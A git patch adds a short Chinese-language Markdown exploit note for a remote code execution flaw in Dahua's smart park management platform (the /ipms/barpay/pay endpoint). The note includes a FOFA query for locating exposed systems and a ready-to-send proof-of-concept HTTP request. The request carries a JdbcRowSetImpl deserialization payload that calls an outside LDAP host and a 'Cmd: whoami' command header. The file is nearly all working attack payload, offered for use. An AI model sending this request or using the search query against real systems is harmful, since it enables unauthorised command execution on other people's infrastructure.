From 955ffce7f0d58f702a7fe038b318f60aab9fc4b7 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 5 May 2024 21:11:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A7=E5=8D=8E=E6=99=BA=E6=85=A7?=
 =?UTF-8?q?=E5=9B=AD=E5=8C=BA=E7=BB=BC=E5=90=88=E7=AE=A1=E7=90=86=E5=B9=B3?=
 =?UTF-8?q?=E5=8F=B0ipms=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��区综合管理平台ipms接口存在远程代码执行漏洞.md | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md

diff --git a/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md b/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md
new file mode 100644
index 0000000..4de5ffb
--- /dev/null
+++ b/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md
@@ -0,0 +1,21 @@
+## 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞
+
+大华智慧园区综合管理平台/ipms/barpay/pay存在远程代码执行漏洞，允许未经授权的攻击者执行系统命令。
+
+## fofa
+```
+body="src=/WPMS/asset/common/js/jsencrypt.min.js"
+```
+
+## poc
+```
+POST /ipms/barpay/pay HTTP/1.1
+Host: {host}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Cmd: whoami
+Content-Type: application/json
+Accept-Encoding: gzip
+Content-Length: 104
+
+{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://gobygo.net/A4", "autoCommit": true}
+```